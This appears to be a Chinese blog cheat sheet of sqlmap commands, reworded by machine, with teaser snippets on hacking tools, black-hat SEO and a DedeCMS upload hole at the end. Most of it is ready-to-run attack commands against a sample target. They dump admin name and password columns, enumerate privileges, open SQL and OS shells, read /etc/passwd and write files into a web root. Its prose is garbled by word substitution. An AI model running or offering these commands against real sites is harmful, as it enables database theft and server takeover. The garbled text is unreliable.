Sqlmap是一个技术专业的SQL引入专用工具,使用 *** 也许多,实际可以用"sqlmap -hh"查询详细的指令帮助文件,我这仅仅给大伙儿共享一些最常见的Sqlmap用法:
1、查验引入点
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11
2、爆全部数据库查询信息内容
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --dbs
爆当今数据库查询信息内容
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-db
3、列举特定数据库查询全部的表名
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D fujieace --tables
'fujieace' 为特定数据库查询名字
4、列举特定表名的全部字段名
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin --columns
'admin' 为特定表名字
5、dump输出打印表名特定列姓名段的值数据信息
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin -C name,password --dump
'name,password' 为特定字段称
1、列举数据库查询智能管理系统客户:
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --users
查询当今数据库连接客户:
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-user
2、分辨当今客户是不是DBA?
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --is-dba
3、查询用户权限:
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges -U fujieace
1、sql shell
这儿根据sqlmap能够立即获得一个sql shell,立即实行sql语句开展互动。
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --sql-shell
sql-shell> select version();
留意:这儿因为进入了sql shell能够实行sql语句了,还可以用 load data infile、load_file、into outfile等涵数来开展文档载入或载入;
2、cmd shell
这 里根据sqlmap能够立即获得一个cmd shell,立即实行cmd指令开展互动。
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-shell
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-cmd=ipconfig
3、载入 *** 服务器上特定文档
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=/etc/passwd
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=d:/test.txt
4、载入本地文件到 *** 服务器上
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-write /test/test.txt --file-dest /var/www/html/1.txt
《网络黑白》该书是“花无际”著作。文件目录以下: 第一章 您好 网络黑客 我的安全性之途 网络黑客发展史 对安全性的思索 怎样学习网络黑客 百度搜索引擎英语的语法 网络黑客武器尖刀 普遍进攻方式 被...
什么叫Etherape? Etherape是以太网接口仿真模拟的图型网络监视器。它具备以图型方法显示信息互联网主题活动的IP,TCP和链路层方式。连接和服务器的尺寸随总流量而转变。它还具备颜色编码协...
我已经写过许多网络黑客方法了,假如你认真学,也可以把握一些了。可是有的新手便会问了,我怎样发觉网址有了你常说的系统漏洞,我怎样应用这种方法?这一就需要采用扫描枪了。 扫描枪是一类自动识...
一家黑帽电影网站,通过垃圾站+挂黑链方式,进行黑帽seo,从而提高百度排名,可实现日收入过万。这家黑帽作弊网站,实际是一家名为“碟民网”的电影网站,通过站长工具查询该网站的百度权重,可发现此网站的...
什么叫GDB? GDB或GNU Project程序调试是一种网络信息安全数据加密/黑客工具,容许客户在运作时在网络技术应用程序流程或程序流程(手机软件)中开展财务审计和发觉。GDB针对开发者或程序猿...
织网5.7的漏洞,可任意上传~ 搜索关键词:Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc 访问/data/admin/ver.txt来查...